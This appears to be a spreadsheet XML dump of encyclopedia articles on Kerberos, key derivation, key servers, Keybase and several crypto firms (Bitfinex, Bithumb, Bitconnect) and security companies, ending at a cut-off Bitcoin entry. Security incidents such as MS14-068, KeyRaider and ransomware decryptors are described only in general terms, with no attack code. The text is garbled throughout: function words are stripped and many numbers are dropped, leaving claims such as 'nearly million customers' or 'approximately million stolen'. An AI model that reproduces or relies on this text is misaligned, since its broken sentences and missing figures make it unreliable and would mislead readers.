implementation based limited version called ebones. ebones based exported bones release (stripped encryption functions calls them) based version kerberos patch-level 2005, internet engineering task force (ietf) kerberos working group updated specifications. updates included: encryption checksum specifications (rfc 3961). advanced encryption standard (aes) encryption kerberos (rfc 3962). edition kerberos specification "the kerberos network authentication service (v5)" (rfc 4120). this version obsoletes 1510, clarifies aspects protocol intended detailed clearer explanation. edition generic security services application program interface (gss-api) specification "the kerberos version generic security service application program interface (gss-api) mechanism: version (rfc 4121).mit makes implementation kerberos freely available, copyright permissions similar used bsd. 2007, formed kerberos consortium foster continued development. founding sponsors include vendors oracle, apple inc., google, microsoft, centrify corporation teamf1 inc., academic institutions royal institute technology sweden, stanford university, mit, vendors cybersafe offering commercially supported versions. microsoft windows windows 2000 later versions kerberos default authentication method. some microsoft additions kerberos suite protocols documented 3244 "microsoft windows 2000 kerberos change password password protocols". 4757 documents microsoft's cipher. while microsoft uses extends kerberos protocol, software. kerberos used preferred authentication method: general, joining client windows domain means enabling kerberos default protocol authentications client services windows domain domains trust relationships domain.in contrast, either client server joined domain part trusted domain environment), windows instead ntlm authentication client server.internet applications enforce kerberos authentication method domain-joined clients using apis provided sspi. microsoft windows windows server include setspn, command-line utility used read, modify, delete service principal names (spn) active directory service account. unix operating systems many unix-like operating systems, including freebsd, openbsd, apple's macos, enterprise linux, oracle's solaris, ibm's aix, hp-ux others, include software kerberos authentication users services. variety non-unix like operating systems z/os, openvms also feature kerberos support. embedded implementation kerberos authentication protocol client agents network services running embedded platforms also available companies. protocol description client authenticates authentication server (as) forwards username distribution center (kdc). issues ticket-granting ticket (tgt), time stamped encrypts using ticket-granting service's (tgs) secret returns encrypted result user's workstation. this done infrequently, typically user logon; expires point although transparently renewed user's session manager logged when client needs communicate service another node "principal", kerberos parlance), client sends tgs, usually shares host kdc. service must already registered service principal name (spn). client uses request access service. after verifying valid user permitted access requested service, issues ticket session keys client. client sends ticket service server (ss) along service request. protocol described detail below. user client-based login without kerberos user enters username password client machine(s). other credential mechanisms like pkinit (rfc 4556) allow public keys place password. client transforms password symmetric cipher. this either uses built-in scheduling, one-way hash, depending cipher-suite used. server receives username symmetric cipher compares data database. login success cipher matches cipher stored user. client authentication client sends cleartext message user (authentication server) requesting services behalf user. (note: neither secret password sent as.) checks whether client database. generates secret hashing password user found database (e.g., active directory windows server) sends back following messages client: message client/tgs session encrypted using secret client/user. message ticket-granting-ticket (tgt, includes client client network address, ticket validity period, client/tgs session key) encrypted using secret tgs. once client receives messages attempts decrypt message secret generated password entered user. user entered password match password database, client's secret different thus unable decrypt message with valid password secret client decrypts message obtain client/tgs session key. this session used communications tgs. (note: client cannot decrypt message encrypted using tgs's secret key.) point, client enough information authenticate tgs. client service authorization when requesting services, client sends following messages tgs: message composed message (the encrypted using secret key) requested service. message authenticator (which composed client timestamp), encrypted using client/tgs session key. upon receiving messages retrieves message message decrypts message using secret key. this gives client/tgs session client (both tgt). using client/tgs session key, decrypts message (authenticator) compares client messages match, server sends following messages client: message client-to-server ticket (which includes client client network address, validity period, client/server session key) encrypted using service's secret key. message client/server session encrypted client/tgs session key. client service request upon receiving messages tgs, client enough information authenticate service server (ss). client connects sends following messages: message from previous step (the client-to-server ticket, encrypted using service's secret key). message authenticator, includes client timestamp encrypted using client/server session key. decrypts ticket (message using secret retrieve client/server session key. using sessions key, decrypts authenticator compares client messages match server sends following message client confirm true identity willingness serve client: message timestamp found client's authenticator (plus version necessary version encrypted using client/server session key. client decrypts confirmation (message using client/server session checks whether timestamp correct. client trust server start issuing service requests server. server provides requested services client. drawbacks limitations kerberos strict time requirements, means clocks involved hosts must synchronized within configured limits. tickets time availability period, host clock synchronized kerberos server clock, authentication fail. default configuration requires clock times five minutes apart. practice, network time protocol daemons usually used keep host clocks synchronized. note servers (microsoft's implementation them) return krb_ap_err_skew result containing encrypted server time clocks offset greater configured maximum value. case, client could retry calculating time using provided server time find offset. this behavior documented 4430. administration protocol standardized differs server implementations. password changes described 3244. case symmetric cryptography adoption (kerberos work using symmetric asymmetric (public-key) cryptography), since authentications controlled centralized distribution center (kdc), compromise authentication infrastructure allow attacker impersonate user. each network service requires different host name need kerberos keys. this complicates virtual hosting clusters. kerberos requires user accounts services trusted relationship kerberos token server. required client trust makes creating staged environments (e.g., separate domains test environment, pre-production environment production environment) difficult: either domain trust relationships need created prevent strict separation environment domains, additional user clients need provided environment. vulnerabilities data encryption standard (des) cipher used combination kerberos, longer internet standard weak. security vulnerabilities exist many legacy products implement kerberos updated newer ciphers like instead des. november 2014, microsoft released patch (ms14-068) rectify exploitable vulnerability windows implementation kerberos distribution center (kdc). vulnerability purportedly allows users "elevate" (and abuse) privileges, domain level. also single sign-on identity management spnego s/key secure remote password protocol (srp) generic security services application program interface (gss-api) host identity protocol (hip) list single sign-on implementations references general rfcsrfc 1510 kerberos network authentication service (v5) [obsolete] 1964 kerberos version gss-api mechanism 3961 encryption checksum specifications kerberos 3962 advanced encryption standard (aes) encryption kerberos 4120 kerberos network authentication service (v5) [current] 4121 kerberos version generic security service application program interface (gss-api) mechanism: version 4537 kerberos cryptosystem negotiation extension 4556 public cryptography initial authentication kerberos (pkinit) 4557 online certificate status protocol (ocsp) support public cryptography initial authentication kerberos (pkinit) 4757 rc4-hmac kerberos encryption types used microsoft windows [obsolete] 5021 extended kerberos version distribution center (kdc) exchanges 5349 elliptic curve cryptography (ecc) support public cryptography initial authentication kerberos (pkinit) 5868 problem statement cross-realm operation kerberos 5896 generic security service application program interface (gss-api): delegate approved policy 6111 additional kerberos naming constraints 6112 anonymity support kerberos 6113 generalized framework kerberos pre-authentication 6251 using kerberos version transport layer security (tls) protocol 6448 unencrypted form kerberos krb-cred message 6542 kerberos version generic security service application program interface (gss-api) channel binding hash agility 6560 one-time password (otp) pre-authentication 6649 deprecate des, rc4-hmac-exp, other weak cryptographic algorithms kerberos 6784 kerberos options dhcpv6 6803 camellia encryption kerberos 6806 kerberos principal name canonicalization cross-realm referrals 6880 information model kerberos version further reading external links kerberos consortium kerberos page website kerberos working group ietf website kerberos sequence diagram archived 2015-03-26 wayback machine heimdal/kerberos implementation</t>
  </si>
  <si>
    <t>Bitpanda</t>
  </si>
  <si>
    <t>bitpanda gmbh austrian company headquartered vienna. bitpanda's mobile provides access trading platform, provides cryptocurrency exchange, commodities securities trading, etfs. 2021, bitpanda achieved valuation four billion dollars nearly million customers almost employees. history company founded 2014 eric demuth, paul klanschek, christian trummer. company first called coinimal changed name bitpanda 2016. 2018, office opened london. initially, bitpanda platform cryptocurrencies traded. 2019, also launched trading precious metals april 2021, launched trading securities.in september 2020, company raised million initial funding round. investors included peter thiel's investment firm. early 2021, company partnered visa introduce credit card people could goods services cryptocurrency commodities stores.in another round funding august 2021, company raised $260 million, increasing valuation billion. 2021, company announced would open office berlin. products bitpanda's offerings include trading cryptocurrencies bitcoin ethereum, commodities silver gold, various securities funds. cryptocurrencies stored digital wallet bitpanda's platform also sent users. addition, company also offers credit card. references</t>
  </si>
  <si>
    <t>Bitium</t>
  </si>
  <si>
    <t>bitium developer cloud service bitium, provided single sign-on identity management software service (saas) cloud-based applications merger google cloud. bitium allows users access cloud software accounts using single login credentials. product integrate cloud apps using saml enhanced security. bitium also allows companies extend existing directory structured cloud apps. bitium integrate active directory, ldap, hris, google apps on-premises directories allow centralized user access control. bitium backed venture capital firm polaris partners early graduate amplify.la accelerator. corporate office located building former studio artist richard diebenkorn. bitium featured cio.com, forbes.com, business2community.com. acquisition september 2017, google cloud announced acquired bitium, step towards better management enterprise-grade cloud customer services across organization, integration features like setting security levels access policies applications. september 2018 bitium announced would close accounts customers outside united states, canada mexico 2018. bitium fully merged google cloud ceased exist 2019. however technology still used google. also list single sign-on implementations references external links official website polaris partners</t>
  </si>
  <si>
    <t>Key derivation function</t>
  </si>
  <si>
    <t>cryptography, derivation function (kdf) cryptographic algorithm derives secret keys secret value main key, password, passphrase using pseudorandom function (which typically uses cryptographic hash function block cipher). kdfs used stretch keys longer keys obtain keys required format, converting group element result diffie–hellman exchange symmetric aes. keyed cryptographic hash functions popular examples pseudorandom functions used derivation. history first deliberately slow (key stretching) password-based derivation function called "crypt" "crypt(3)" page), invented robert morris 1978. would encrypt constant (zero), using first characters user's password key, performing iterations modified encryption algorithm 12-bit number read real-time computer clock used perturb calculations). resulting 64-bit number encoded printable characters stored unix password file. while great advance time, increases processor speeds since pdp-11 made brute-force attacks crypt feasible, advances storage rendered 12-bit salt inadequate. crypt function's design also limits user password characters, limits keyspace makes strong passphrases impossible.although high throughput desirable property general-purpose hash functions, opposite true password security applications defending brute-force cracking primary concern. growing massively-parallel hardware gpus, fpgas, even asics brute-force cracking made selection suitable algorithms even critical good algorithm enforce certain amount computational cost cpus, also resist cost/performance advantages modern massively-parallel platforms tasks. various algorithms designed specifically purpose, including bcrypt, scrypt and, recently, lyra2 argon2 (the latter winner password hashing competition). large-scale ashley madison data breach roughly million passwords hashes stolen attackers illustrated importance algorithm selection securing passwords. although bcrypt employed protect hashes (making large scale brute-force cracking expensive time-consuming), significant portion accounts compromised data also contained password hash based fast general-purpose algorithm, made possible million passwords cracked matter weeks.in june 2017, u.s. national institute standards technology (nist) issued revision digital authentication guidelines, nist 800-63b-3,: 5.1.1.2 stating that: "verifiers shall store memorized secrets [i.e. passwords] form resistant offline attacks. memorized secrets shall salted hashed using suitable one-way derivation function. derivation functions take password, salt, cost factor inputs generate password hash. their purpose make password guessing trial attacker obtained password hash file expensive therefore cost guessing attack high prohibitive." modern password-based derivation functions, pbkdf2 (specified 2898), based recognized cryptographic hash, sha-2, salt least bits chosen randomly) high iteration count. nist recommends minimum iteration count 10,000.: 5.1.1.2 "for especially critical keys, powerful systems systems user-perceived performance critical, iteration count 10,000,000 appropriate.” derivation original derivation, generation keys secret passwords passphrases. variations theme include: conjunction non-secret parameters derive keys common secret value (which sometimes also referred "key diversification"). such prevent attacker obtains derived learning useful information either input secret value derived keys. also used ensure derived keys desirable properties, avoiding "weak keys" specific encryption systems. components multiparty key-agreement protocols. examples derivation functions include kdf1, defined ieee 1363-2000, similar functions ansi x9.42. derive keys secret passwords passphrases password-based kdf). derive keys different length ones provided: example kdfs designed purpose hkdf. stretching strengthening. stretching strengthening derivation functions also used applications derive keys secret passwords passphrases, typically desired properties used directly cryptographic keys. applications, generally recommended derivation function made deliberately slow frustrate brute-force attack dictionary attack password passphrase input value. such expressed kdf(key, salt, iterations), derived key, derivation function, original password, salt random number acts cryptographic salt, iterations refers number iterations sub-function. derived used instead original password system. values salt number iterations fixed) stored hashed password sent cleartext (unencrypted) encrypted message.the difficulty brute force attack increased number iterations. practical limit iteration count unwillingness users tolerate perceptible delay logging computer seeing decrypted message. salt prevents attackers precomputing dictionary derived keys.an alternative approach, called strengthening, extends random salt, (unlike stretching) securely deletes salt. this forces attacker legitimate users perform brute-force search salt value. although paper introduced stretching referred earlier technique intentionally chose different name, term "key strengthening" often (arguably incorrectly) used refer stretching. password hashing despite original derivation, kdfs possibly better known password hashing (password verification hash comparison), used passwd file shadow password file. password hash functions relatively expensive calculate case brute-force attacks, stretching kdfs happen provide characteristic. non-secret parameters called "salt" context. 2013 password hashing competition announced choose new, standard algorithm password hashing. july 2015 competition ended argon2 announced final winner. four algorithms received special recognition: catena, lyra2, makwa yescrypt. references further reading percival, colin (may 2009). "stronger derivation sequential memory-hard functions" (pdf). bsdcan'09 presentation. retrieved 2009. derivation functions</t>
  </si>
  <si>
    <t>Key distribution center</t>
  </si>
  <si>
    <t>cryptography, distribution center (kdc) part cryptosystem intended reduce risks inherent exchanging keys. kdcs often operate systems within users permission certain services times others. security overview instance, administrator established policy certain users back tape. many operating systems control access tape facility "system service". system service restricts tape drive operate behalf users submit service-granting ticket wish remains task distributing tickets appropriately permitted users. ticket consists includes) key, term mechanism distributes kdc. usually, situations, also operates system service. operation typical operation involves request user service. cryptographic techniques authenticate requesting users themselves. also check whether individual user right access service requested. authenticated user meets prescribed conditions, issue ticket permitting access. kdcs mostly operate symmetric encryption. (but all) cases shares parties. produces ticket based server key. client receives ticket submits appropriate server. server verify submitted ticket grant access user submitting security systems using kdcs include kerberos. (actually, kerberos partitions functionality different agents: (authentication server) (ticket granting service).) external links kerberos authentication protocol microsoft: kerberos distribution center technet microsoft: distribution center msdn</t>
  </si>
  <si>
    <t>Bithumb</t>
  </si>
  <si>
    <t>bithumb south korean cryptocurrency exchange. founded 2014, bithumb korea million registered users, million mobile users, current cumulative transaction volume exceeded trillion history october 2018, global consortium signed deal majority share holding bithumb's largest investor.on january 2019, otc-listed holding company blockchain industries signed binding letter intent merge bithumb march 2019. plan form publicly traded entity called blockchain exchange alliance (bxa) would ‘up-list’ either york stock exchange nasdaq make first major cryptocurrency exchange public.on april 2019, bithumb announced loss krw205.5 billion (us$180 million) 2018, sharp turnaround krw427.2 billion profit 2017, despite 2018's sales rising 17.5% krw391.7 million. company blamed loss sharp decline price cryptocurrencies reduced trading volume. controversy june 2017, hackers stole user information bithumb employee's personal computer.in january 2018, bithumb raided government alleged evasion. they found guilty still nearly million back taxes.in june 2018, approximately million cryptocurrency stolen bithumb hack.in january 2019, total bithumb employees laid response declining trading volume profits 2018.on march 2019, bithumb said hacked. pointed fingers insiders. nearly million worth ripple tokens estimated stolen.on september 2020, bithumb reported local korean news bithumb exchange raided seoul metropolitan police agency's intelligent crime investigation unit. according report, search seizure related suspicion investment fraud. references external links official website</t>
  </si>
  <si>
    <t>Bitfinex</t>
  </si>
  <si>
    <t>bitfinex cryptocurrency exchange owned operated ifinex registered british virgin islands. their customers' money stolen lost several incidents, unable secure normal banking relationships.research suggests price manipulation bitcoin bitfinex accounted half price increase bitcoin late 2017. history bitfinex founded december 2012 peer-to-peer bitcoin exchange, offering digital asset trading services users around world. bitfinex initially started margin lending platform bitcoin later added support cryptocurrencies. 2015 exchange hacked, resulted loss 1,500 bitcoins $400,000 customers assets. october 2018, bitfinex serious difficulties banking relationships. management stated "bitfinex insolvent october 7."in june 2016, u.s. commodity futures trading commission ordered bitfinex $75,000 fine offering illegal off-exchanged financed commodity transactions. order also found bitfinex violated commodity exchange registering futures commission merchant.in april 2017, bitfinex announced experiencing delays processing withdrawals wells fargo wire transfers. shortly wells fargo cutoff, bitfinex stated international wires taiwanese bank. since then, bitfinex moved series banks countries, without disclosing customers money kept.noble bank international juan, puerto rico reportedly handled dollar banking exchange 2017 2018. banking relationship reportedly terminated september 2018 noble bank encountered financial difficulties.in march 2018, british virgin islands-based bitfinex confirmed exchange’s plans relocate primary server infrastructure zug, switzerland. 2018, bitfinex emailed users asking details, company indicated would share government british virgin islands, might turn pass governments users' countries residence.phil potter, chief strategy officer bitfinex left exchange june 2018.in april 2019 york attorney general letitia james launched investigation accusing bitfinex using reserves tether, affiliated company cover loss $850 million panamanian payment processor known crypto capital corp. reggie fowler, alleged connections crypto capital, indicted april 2019, running unlicensed money transmitting business cryptocurrency traders. believed failed return $850 million unnamed client. investigators also seized $14,000 counterfeit currency office. bitfinex unable obtain normal banking relationship, according lawsuit, deposited billion panamanian payment processor known crypto capital corp. contract ever signed crypto capital. james alleged 2018 bitfinex knew suspected crypto capital absconded money, investors never informed loss.according unaudited 2019 bitfinex accounting report, 2018 gross profits $418 million, expenses million, profits $404 million, dividends almost $262 million. bitfinex raised billion investment days. reported figures 2017 $333.5 million gross profits, $6.8 million expenses, $326 million profit $246 million dividends.on october 2021, announced bitfinex $1.5 million fine commodity futures trading commission illegal, off-exchange retail commodity transactions digital assets americans. 2016 hack august 2016, bitfinex announced suffered major security breach. immediately thereafter, bitcoin's trading price plunged 20%. after learning breach, bitfinex halted bitcoin withdrawals trading. hack, second-biggest breach bitcoin exchange platform, 119,756 units bitcoin, worth million time, stolen. bitcoin taken users' segregated wallets bitfinex said tracking hack. exchange customers, even whose accounts broken into, account balance reduced received tokens proportion losses. exchange's access u.s. dollar payments withdrawals curtailed. hack happened even though bitfinex securing funds bitgo, uses multiple-signature security. stolen bitcoin seized united states department justice, york couple, ilya lichtenstein wife, heather morgan, federally charged february 2022 conspiring launder bitcoin, worth $3.6 billion. according justice officials, lichtenstein morgan charged conspiracy launder money, maximum sentence years prison, conspiracy defraud united states, carries maximum sentence five years prison. february 2022, reported heather morgan detained manhattan last february 2022 husband, ilya lichtenstein. tether tether cryptocurrency called stablecoin) tether limited claimed pegged dollar. tether closely associated bitfinex, whom, 2018, shared common shareholders management. 2017, critics raised questions relationship bitfinex tether.in february 2021, bitfinex agreed $18.5 million settlement york attorney general's office regarding allegations bitfinex parent ifinex making false statements backing tether movement hundreds millions dollars companies cover massive losses bitfinex 2017 2018. part agreement, bitfinex maintain prohibition trading activity yorkers.in 2021, bitfinex repaid remaining loan balance tether full. also bitcoin cryptocurrency exchange coinbase kraken references external links official website</t>
  </si>
  <si>
    <t>Key server (cryptographic)</t>
  </si>
  <si>
    <t>computer security, server computer receives serves existing cryptographic keys users programs. users' programs running network server another networked computer. keys distributed server almost always provided part cryptographically protected public certificates containing also 'entity' information owner key. certificate usually standard format, openpgp public format, x.509 certificate format, pkcs format. further, almost always public asymmetric encryption algorithm. history servers play important role public cryptography. public cryptography individual able generate pair, keys kept private distributed publicly. knowledge public compromise security public cryptography. individual holding public pair carry cryptographic operations allow secret communications strong authentication holder matching private key. need public pair order start communication verify signatures bootstrapping problem. locating keys writing individual asking transmit public keys time consuming insecure. servers central repositories alleviate need individually transmit public keys root chain trust. first web-based keyserver written thesis marc horowitz, studying mit. horowitz's keyserver called keyserver web-based openpgp http keyserver protocol (hkp), used allow people interact keyserver. users able upload, download, search keys either port 11371, pages scripts. before creation keyserver, keyservers relied email processing scripts interaction. separate server, known certificate server, developed pgp, inc. used software (through version 2.5.x server) default server version (for client software), keyserver.pgp.com. network associates granted patent co-authored callas (united states patent 6336186) server concept. replace aging certificate server, ldap-based server redesigned network associates part randy harmon sassaman, called keyserver with release 6.0, ldap preferred server interface network associates’ versions. this ldap ldaps server (which also spoke backwards compatibility, though protocol (arguably correctly) referred “http” “https”) also formed basis administration tools private servers corporate settings, along schema netscape directory server. keyserver later replaced corporation global directory[1] allows keys published downloaded using https ldap. public versus private keyservers many publicly accessible servers, located around world, computers store provide openpgp keys internet users cryptosystem. instance, computers mostly are, individuals bono service, facilitating trust model uses. several publicly accessible s/mime servers available publish retrieve certificates used s/mime cryptosystem. there also multiple proprietary public infrastructure systems maintain servers users; private public, participating users likely aware keyservers all. privacy concerns many individuals, purpose using cryptography obtain higher level privacy personal interactions relationships. pointed allowing public uploaded server using decentralized trust based cryptographic systems, like pgp, reveal good deal information individual wish kept private. since relies signatures individual's public determine authenticity key, potential relationships revealed analyzing signers given key. way, models entire social networks developed. problems keyservers openpgp keyservers since development 1990s suffered problems. once public uploaded, purposefully made difficult remove servers auto-synchronize done order fight government censorship). some users stop using public keys various reasons, forget pass phrase, private compromised lost. cases, hard delete public server, even deleted, someone else upload fresh copy public server. this leads accumulation fossil public keys never away, form "keyserver plaque". consequence anyone upload bogus public keyserver, bearing name person fact key, even worse, vulnerability: certificate spamming attack.the keyserver check legitimate (belong true owner). solve problems, corp developed generation server, called global directory. this keyserver sent email confirmation request putative owner, asking person confirm question theirs. confirm global directory accepts key. this renewed periodically, prevent accumulation keyserver plaque. result higher quality collection public keys, vetted email key's apparent owner. consequence, another problem arise: global directory allows account maintenance verifies email, cryptographically, anybody access email account could example delete upload bogus one. last internet engineering task force draft also defines distributed server network, based records: find someone@example.com, requesting example.com's server. keyserver examples these keyservers often used looking keys --recv-keys. these queried https:// (https) hkps:// (hkp tls) respectively. keys.openpgp.org pgp.mit.edu keyring.debian.org keyserver.ubuntu.com attester.flowcrypt.com zimmermann.mayfirst.org pgp.surf.nl also lightweight directory access protocol gnupg references external links list servers curlie openpgp http keyserver protocol (hkp) (march 2003) openpgp public server sourceforge openpgp server software package distributed bsd-style license. largely replaced hockeypuck. synchronizing server (sks) openpgp server software package distributed gpl. hockeypuck synchronising openpgp keyserver software package distributed agpl. hagrid non-synchronising, verifying openpgp keyserver software package distributed agpl. global directory hosted corporation.</t>
  </si>
  <si>
    <t>Bitdefender</t>
  </si>
  <si>
    <t>bitdefender romanian cybersecurity technology company headquartered bucharest, romania, offices united states, europe, australia middle east.the company founded 2001 current main shareholder, florin talpeș. bitdefender develops delivers cybersecurity products services, including endpoint protection, cloud managed security, antivirus software security. bitdefender products distributed partners countries market estimated generate revenues. 2020, company employed 1,600 people worldwide.as 2020, bitdefender ranked ninth globally among microsoft windows anti-malware application vendors 4.27% market share. history bitdefender software originally developed softwin sold (antivirus expert) 1996 2001, name changed. 2007, softwin spun bitdefender. company milestones 1990: creation softwin, first start-ups post-communist romania. rapid growth computer viruses leads development softwin (antivirus expert) 2001: bitdefender subsidiary created. solution rebranded bitdefender name. 2004: first offices outside romania germany further expansion middle east (2011) denmark nordics region (2015). 2007: bitdefender becomes separate business entity external capital entry. axxess capital investment fund enters company's shareholding.2011: bitdefender launches enterprise range virtualization security product. 2015: bitdefender creates consumer product category bitdefender security services.2017: bitdefender makes first major acquisition acquiring french partner profil technology source.british fund vitruvian buys stake company. transaction values bitdefender $600 million.2018: bitdefender creates subsidiary australia acquisition assets business partner etech.bitdefender acquires behavioral network security analytics company redsocks.2019: bitdefender opens security operations center antonio, texas. 2021: bitdefender unveils extended detection response (xdr) platform, offering business customers visibility incident context investigations accelerate threat validation, response actions remediation. bitdefender products bitdefender develops markets cybersecurity products services companies consumers including endpoint protection (with hardening risk analytics capabilities), extended detection response, multi-cloud security, managed detection response, antivirus software, security, privacy services. company also delivers products services managed services providers system integrators (oem). fighting cyber-crime bitdefender advises europol's european cybercrime centre (ec3) supporting investigations criminal activity cyberspace, sharing relevant data knowledge disruption, prevention, investigation prosecution. company involved ongoing cooperation international enforcement actors local, regional international police offices support fight crime.bitdefender also part cybersecurity tech accord safer online world, collaboration among global technology companies committed protecting customers users helping defend malicious threats. independent tests bitdefender number awards av-comparatives, anti-virus assessment firm. controversies incidents trojan.fakealert.5 march 2010, computers running bitdefender 64-bit versions windows affected malfunctioning update classified every executable program well files infected. these files marked 'trojan.fakealert.5' moved quarantine. this action software systems malfunctions affected users around world. bitdefender representatives announced removal faulty update workaround users affected, except using 2008 version. darkside ransomware 2021, bitdefender accused self-promotion releasing publicly announcing decryptor detriment actual victims regards darkside, hacking group. 2020, darkside switched main encryption ransomware product "affiliate" model wherein attackers could download software exchange portion profits. however, introduced process affiliate hackers would private meaning decryption package single target paid ransom would work target ransomware installed. security researchers noticed quietly already helping victims software, public notice, making attackers would inexplicable decrease ransom payments could written chance. time, bitdefender researchers developed decryptor issued blog post january 2021 describing flaw offering decryptor free download, order make many organizations possible aware existence reduce impact darkside ransomware attacks. this criticized article technology review: claiming, first, bitdefender's program even safe flawed would "damage" files decrypted bugs within second, blog post tipped darkside nature flaw; darkside promptly patched sarcastically thanked bitdefender pointing out, went campaign extortion. notable incident took place bitdefender's public disclosure colonial pipeline cyberattack 2021. while security researchers using flaw acknowledge probable darkside would eventually noticed fixed issue, still criticized bitdefender using merely brief burst publicity, rather would help victims scheme. bitdefender defended actions blog. article blog post triggered discussion among cybersecurity professionals pros cons publicly disclosing decryptors (e.g. world canada social media comments notable cybersecurity news reporter). revil ransomware september 2021, bitdefender published universal decryptor utility help past victims revil ransomware recover encrypted files. also comparison antivirus software comparison firewalls comparison computer viruses multiscanning references external links official website</t>
  </si>
  <si>
    <t>Bitconnect</t>
  </si>
  <si>
    <t>bitconnect (also spelled bitconnect, kimconnect stylized bitconnect, ticker code bcc) open-source cryptocurrency connected high-yield investment program, type ponzi scheme. after platform administrators closed earning platform january 2018, refunded users' investments following coin value crash, confidence lost value coin plummeted previous high nearly $525. history bitconnect released 2016 goal allowing users lend value bitconnect coin return interest payments. marquee program so-called lending platform users traded bitcoin bitconnect coin could lock instantaneous value coin period time earning interest calculated daily. interest payouts determined so-called "trading bot". trading controversial piece bitconnect.co system. liquidity cryptocurrency funded users' ability exchange earnings bitcoin. november 2017, government united kingdom issued bitconnect notice months prove legitimacy.on january 2018, texas state securities board issued cease desist company, calling ponzi scheme, citing failings user earnings transparency, misleading statements. texas state security board north carolina secretary state securities division warned bitconnect registered sell securities respective states.on january 2018, bitconnect shut down, prices crashed immediately after. bitconnect announced would refund loans. however, bitconnect website remained open operational, begun allowing users purchase bccx coins coins.on january 2018, temporary restraining order froze bitconnect's assets, expiring february however, bitconnect entity never actually existed, unclear assets bitconnect ever had). alleged india-region leader (one level founder) bitconnect, divyesh darji, arrested delhi, india, august 2018. suspected darji connected well-known criminal entities involved laundering so-called "black money" indian government's demonetization rupee. 2019, darji arrested released bail connection similar scam called regal coin. criticism collapse bitconnect suspected ponzi scheme multilevel marketing structure impossibly high payouts daily compounded interest). bitconnect interest fluctuated greatly volatility bitcoin, value tied bitconnect coin among world's successful cryptocurrency tokens price collapsed traders began losing confidence. rose post price $0.17 all-time high us$463 december 2017; declined us$0.40 march 2019. bitconnect released outstanding loans rate us$363.62 bitconnect wallet form bcc. however, soon news internal exchange price liquidity collapsed resulting nearly complete loss value. legal issues january 2018, bitconnect announced would shut cryptocurrency exchange lending operation regulators texas north carolina issued cease desist order january 2018, u.s. district court, western district kentucky, granted temporary restraining order freezing bitconnect's assets disclose cryptocurrency wallet trading account addresses, well identities anyone bitconnect sent digital currencies within last days".in september 2021, u.s. securities exchange commission sued bitconnect, alongside founder indian satish kumbhani, american glenn arcaro served bitconnect's lead national promoter united states august 2017 january 2018, future money ltd, company arcaro created lure bitconnect's lending program. alleged bitconnect defrauded u.s. investors total billion.parallel civil charges, united states department justice initiated criminal charges arcaro. september 2021, arcaro pleaded guilty criminal charges pressed includes conspiracy commit wire fraud criminal forfeiture. also indicted kumbhani various federal charges february 2022, including money laundering fraud. internet meme october 2017, bitconnect held first (and only) annual ceremony pattaya, thailand. during event, investor named carlos matos york city gave exuberant presentation testimonial website, included intensely screaming "bitconnect" several times; scene quickly became internet meme. both matos' meme questionable practices bitconnect profiled john oliver keegan-michael program last week tonight reacted h3h3productions. also list cryptocurrencies onecoin plustoken tech references external links official website (last archived version, november 2018)</t>
  </si>
  <si>
    <t>KeyRaider</t>
  </si>
  <si>
    <t>keyraider computer malware affects jailbroken apple devices, specifically iphones, allows criminals steal users' login password information, well lock devices demand ransom unlock them. discovered researchers palo alto networks weiphone august 2015, believed 225,000 people login password information stolen, making according cybersecurity columnist, joseph steinberg, "one damaging pieces malware ever discovered apple universe." malware originally found chinese website, spread countries including united states. keyraider affects iphones jailbroken. also ransomware references</t>
  </si>
  <si>
    <t>Keybase</t>
  </si>
  <si>
    <t>keybase directory maps social media identities encryption keys (including, limited keys) publicly auditable manner. additionally offers end-to-end encrypted chat cloud storage system, called keybase chat keybase filesystem respectively. files placed public portion filesystem served public endpoint, well locally filesystem mounted keybase client.keybase supports publicly connecting twitter, github, reddit, hacker news, mastodon identities, including websites domains one's control, encryption keys. also supports bitcoin, zcash, stellar, wallet addresses. keybase supported coinbase identities since initial public release, ceased march 2017, coinbase terminated public payment pages. general, keybase allows service public identities integrate keybase.on 2020, keybase announced acquired zoom, part zoom's "plan strengthen security video communications platform". identity proofs keybase allows users prove link certain online identities (such twitter reddit account) encryption keys. instead using system oauth, identities proven posting signed statement account user wishes prove ownership this makes identity proofs publicly verifiable instead trust service truthful, user find check relevant proof statements themselves, keybase client automatically. addition interface, keybase offers client application windows, mac, android, ios, desktop linux distributions, written electron front end. offers additional features website, end-to-end encrypted chat, teams feature, ability files access private files personal team keybase filesystem storage. each device running client authorized signature made either another device user's key. each device also given per-device nacl (pronounced "salt") perform cryptographic operations. chat keybase chat end-to-end encrypted chat built keybase launched february 2017. distinguishing feature keybase chat allows keybase users send messages someone using online aliases (for example reddit account), even signed keybase yet.if recipient (the online alias owner) account keybase, seamlessly receive message. recipient keybase account, later signs proves link online account devices, sender's device rekey message recipient based public proof posted, allowing read message. since keybase checks proof, avoids trust first use. keybase filesystem (kbfs) keybase allows users store files cloud storage called keybase filesystem free. there storage upgrades available, paid plans allowing data planned. filesystem divided three parts: public files, private files, team files. unix-like machines, filesystem mounted /keybase, microsoft windows systems usually mounted drive. currently, mobile versions keybase client download files kbfs, mount however, support operations rekeying files necessary. october 2017 keybase brought end-to-end encrypted repositories. public files public files stored /public/username, publicly visible. files public filesystem automatically signed client. only user folder named edit contents, however, folder named comma-separated list users (e.g. folder /public/foo,bar,three would editable users foo, bar, three).public files accessed user. single user folders displayed keybase.pub also accessible opening directory mounted version filesystem. multi user folders (such /public/foo,bar,three) accessible mounted version system. private files private files stored /private/username, visible username. private folders, like public folders, named user (e.g. folder /private/foo,bar,three would readable editable users foo, bar, three). private files also read users (e.g. folder /private/writer1,writer2,#reader1,reader2 would readable editable users writer1 writer2 readable reader1 reader2). unlike public files, private files encrypted signed uploaded, making end-to-end encrypted. team files team files stored /team/teamname, publicly visible team members. files team filesystem automatically encrypted signed client. only users marked writers edit contents, however, readers access files stored there. teams september 2017, keybase launched keybase teams. team described "...a named group people." each team private folder keybase filesystem, number chat channels (similar slack). teams also divided "subteams" placing team name. example, wikipedia.projects would subteam wikipedia, wikipedia.projects.foobar would subteam wikipedia.projects (and therefore, also wikipedia). team administration teams largely administered adding signatures chain. each signature add, remove, change membership user team, well changes made subteams. each chain starts signature made team owner, subsequent actions signed team admins users. this ensures every action made authorized user, actions verified anyone possession public used. references external links official website keybase github</t>
  </si>
  <si>
    <t>Keyring (cryptography)</t>
  </si>
  <si>
    <t>cryptography, keyring stores known encryption keys (and, cases, passwords). example, privacy guard makes keyrings. also keystore references</t>
  </si>
  <si>
    <t>Bitcoin</t>
  </si>
  <si>
